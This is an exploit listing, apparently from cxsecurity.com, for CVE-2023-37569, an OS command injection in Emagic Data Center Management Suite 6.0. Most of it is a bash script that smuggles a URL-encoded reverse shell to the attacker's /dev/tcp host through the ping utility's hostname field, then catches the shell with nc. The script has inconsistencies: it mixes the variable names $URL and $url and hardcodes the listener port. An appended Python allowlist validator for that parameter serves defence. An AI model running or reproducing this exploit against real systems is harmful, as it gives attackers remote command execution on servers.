Emagic Data Center Management Suite 6.0 Remote Command Execution

2023.08.13
Credit: thewhiteh4t
Risk: High
Local: No
Remote: Yes
CWE: CWE-78

# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
# Date: 03-08-2023
# Exploit Author: Shubham Pandey & thewhiteh4t
# Vendor Homepage: https://www.esds.co.in/enlight360
# Version: 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2023-37569

URL=$1
LHOST=$2
LPORT=$3

echo "*****************************"
echo "* ESDS eMagic 6.0.0 RCE *"
echo "* > CVE-2023-37569 *"
echo "* > Shubham & thewhiteh4t *"
echo "*****************************"

if [ $# -lt 3 ]; then
    echo """
    USAGE :
    ./exploit.sh http://<IP> <LHOST> <LPORT>
    ./exploit.sh http://192.168.0.10 192.168.0.20 1337
    """
    exit 1
fi

url="$1/index.php/monitor/operations/utilities/"

echo "[+] URL : $URL"
echo "[+] LHOST : $LHOST"
echo "[+] LPORT : $LPORT"
echo

payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

echo "[!] Triggering exploit..."

echo $url
(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &

echo "[+] Catching shell..."
nc -lvp 4444
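
A defensive check for the hostname parameter of the ping utility request above, written as an added example; it is not part of the original advisory or the vendor's code. The function names are hypothetical and the sample requests are constructed. It validates the decoded value against a strict host/IP allowlist, which is the kind of check a proxy rule or the application itself could apply before the value reaches a shell (CWE-78).

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Path and parameter name as they appear in the exploit's request.
UTILITY_PATH = "/index.php/monitor/operations/utilities/"
# RFC 1123 label: letters, digits, hyphens; no leading or trailing hyphen,
# which also keeps a value from being read as a command-line option.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_safe_host(value: str) -> bool:
    """True only for a literal IP address or a syntactically valid hostname."""
    try:
        ip = ipaddress.ip_address(value)
        # Python 3.9+ accepts an IPv6 zone ("::1%eth0") with almost any text
        # after the '%', so a zone is rejected rather than trusted.
        return getattr(ip, "scope_id", None) is None
    except ValueError:
        pass
    return len(value) <= 253 and _HOSTNAME.fullmatch(value) is not None


def inspect_request(method: str, url: str, body: str) -> list:
    """Return one finding per unsafe hostname value sent to the endpoint."""
    if method.upper() != "POST" or urlsplit(url).path != UTILITY_PATH:
        return []
    # parse_qs percent-decodes, so %3B, %20 and %27 are checked as ; space '
    params = parse_qs(body, keep_blank_values=True)
    return [
        f"hostname is not a plain host or IP: {value!r}"
        for value in params.get("hostname", [])
        if not is_safe_host(value)
    ]


if __name__ == "__main__":
    # Constructed sample requests, shaped like the POST in the script above.
    target = "http://192.168.0.10" + UTILITY_PATH
    for body in (
        "utility=ping&operations=yes&hostname=192.168.0.1&probe_id=1",
        "utility=ping&operations=yes&hostname=%3B%20echo%20test&probe_id=1",
    ):
        print(inspect_request("POST", target, body) or "ok")
```

Every value of a repeated hostname parameter is checked, so a benign first value does not hide an unsafe second one.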


Copyright 2024, cxsecurity.com